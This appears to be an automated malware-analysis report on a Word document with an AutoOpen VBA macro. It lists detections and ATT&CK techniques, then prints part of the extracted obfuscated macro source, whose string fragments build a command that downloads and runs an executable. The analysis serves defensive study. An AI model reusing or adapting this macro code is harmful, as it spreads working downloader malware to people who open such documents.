Verdict: MALICIOUS
Risk Score: 250
Malware Insights
MITRE ATT&CK:
- T1059.005 Visual Basic
- T1204.002 Malicious File
- T1105 Ingress Tool Transfer
The sample is a malicious Word document containing VBA macros. An AutoOpen macro is present and calls the Shell() function, indicating an attempt to execute external code. The macro assembles string fragments that appear to form a command to download and execute a second-stage payload, likely a Windows executable, from a remote source.
Heuristics (8)
- ClamAV: Doc.Malware.Valyria-6923113-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Malware.Valyria-6923113-0
- VBA macros detected (medium, OLE_VBA_MACROS, 4 related findings): Document contains VBA macro code
- Shell() call in VBA (critical, OLE_VBA_SHELL): Shell() call in VBA
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro
- CreateObject call (high, OLE_VBA_CREATEOBJ): CreateObject call
- Environ() call (low, OLE_VBA_ENVIRON): Environ() call (environment variable access)
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence of the old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://www.iec.ch (channel: in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 45129 bytes | befec462ddc628a7b5b27d6359352a0ca27d4db5e933e27fa9a085408ec98443 |

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "NewMacros"
Function fkfnbrkqw()
Dim tnqwli
tnqwli = 9444
ymbokj39 = Array("oiyi", ";$GsDYi='7.exe';$s")
fkfnbrkqw = ymbokj39
End Function
Function uwke9()
uquyk = Array("FocI86", "$fqjxljle+")
uwke9 = uquyk
End Function
Function LIEFTHT()
znjyukmuu = Array("ZE+$B", "EOKQJQYVCN")
LIEFTHT = znjyukmuu
End Function
Function yieuqo72()
Const yemxdb = "-6779"
slkkpl = Array("LIOSSIFF10", "ie")
yieuqo72 = slkkpl
End Function
Function ppuxys3()
iiutsi = Array("hil';$zaul", "lqokz63")
ppuxys3 = iiutsi
End Function
Function YYECNOZD()
asoyzu = Array("GiQU", "pe ';$usgtjx")
YYECNOZD = asoyzu
End Function
Function qualnag()
PWMQINOAO = Array("vvtpkeukm08", "';$ltawx='")
qualnag = PWMQINOAO
Dim aarc As Integer
aarc = -25120
End Function
Function boyy()
XXNCI = Array("i+$UyiYekX);", "QaPu")
boyy = XXNCI
Const pppgamubr = -53372
End Function
Function aarhofbf()
uzenelbri = Array("lpmjldwoa", "+$PJXE")
aarhofbf = uzenelbri
End Function
Function AOEI1()
UBETFYIAI = Array("SUpl01+$vj", "qpojwhgue")
AOEI1 = UBETFYIAI
Const fajbk = "38926"
End Function
Function AUUf()
Const cfedcoltln65 = 38682
ksctwrrixfdj0 = Array("OOEGNEOVW", "fbnzy+$ugjpca+$")
AUUf = ksctwrrixfdj0
End Function
Function oclyav()
LdmzcGuodtmu = Array(";$Lrmwuy28", "czokbihevg")
oclyav = LdmzcGuodtmu
End Function
Function ecwsxflr()
psiitxrfm7 = Array("yoezu+$DwA", "gli")
ecwsxflr = psiitxrfm7
End Function
Function yaicleo43()
BasIE = Array("ks", "iqexe+$nnidz+$w")
Const idceoi = -56365
yaicleo43 = BasIE
End Function
Function ZyiAE()
Const hrzoihpjh3 = 24335
Const ovsic = 35503
rcldllxtu = Array("fqzltwu", "yz='//shan';")
ZyiAE = rcldllxtu
End Function
Function xraaqhy()
zflnu = Array("u='{ $'", "vhiaylidx79")
xraaqhy = zflnu
End Function
Function WxwhHqXzj0()
YRvxhG = Array("'Pro'", "iwzdtlusrc")
WxwhHqXzj0 = YRvxhG
End Function
Function etzgfpoo50()
BbPArluiae = Array("ZqcsYwMw3", "sajt")
etzgfpoo50 = BbPArluiae
End Function
Function abuuwcmb()
AuxoeDttJa = Array("45+$bkyzsl", "isladbs")
abuuwcmb = AuxoeDttJa
Const yzwosf = -31115
aeavfzse = 23348
End Function
Function yiiu94()
kdyu = Array("AurQaO", "='f($drl';")
yiiu94 = kdyu
End Function
Function wkbsayo93()
bcydhfoa57 = Array("shel", "YuaYuU")
wkbsayo93 = bcydhfoa57
End Function
Function FXwcpwbU()
gfakemk = Array("ee", "'emp';$hxuac")
FXwcpwbU = gfakemk
Dim guuonmu As Integer
guuonmu = 9730
End Function
Function uilgkwa()
ciubl = Array("AistoAsbIe14", "5='curse ';$")
uilgkwa = ciubl
End Function
Function szrzsrjwkv()
valdaiefpr = Array("WngPhnHzke", "B+$gsaby+$aooy66+")
szrzsrjwkv = valdaiefpr
End Function
Function iaeiqz()
eaoozmiyx = Array("itz", "UD+$zefbp0")
Const ilqzbh10 = "3091"
iaeiqz = eaoozmiyx
End Function
Function fluywygr()
oaycaae58 = Array("ayu", "ormat';$xjeoqhn='")
Dim VWIEXCKWV As Integer
VWIEXCKWV = 6907
fluywygr = oaycaae58
End Function
Function zdtsthcl()
iekeaui = Array("bgq='ent'; Invo", "xhcvy14")
zdtsthcl = iekeaui
End Function
Function blhvwuu()
ebagvqiybz30 = Array("pjrooevmhb", "' %s; ';$LqvaTi=")
blhvwuu = ebagvqiybz30
Dim YAOIPP
YAOIPP = -31120
Const tsuoutbc00 = -51740
End Function
Function ydycu()
Dim fgkgia
fgkgia = 17239
fgdhmwdco = -13304
ovgaa = Array("';$lpbrqat", "dlgd")
ydycu = ovgaa
iykgspn = -25269
End Function
Function WeiDP()
NYJKFG = Array("WjmamYbzi", "eg0='\eouo';$vjyoezu")
WeiDP = NYJKFG
End Function
Function AEhKzcm()
sowcvbe = Array(";$zefbp06='cess;';$", "pjmcxesfi")
AEhKzcm = sowcvbe
End Function
Function tpcqelh63()
PRUGOZU6 = Array("ch", "YQB='Net.W';$yajat='")
tpcqelh63 = PRUGOZU6
Const szanviu80 = "-26062"
Const jwyqri = 9580
End Function
Function efdsche()
nubyoljlt = Array("swo='nfig'", "eof
... (truncated)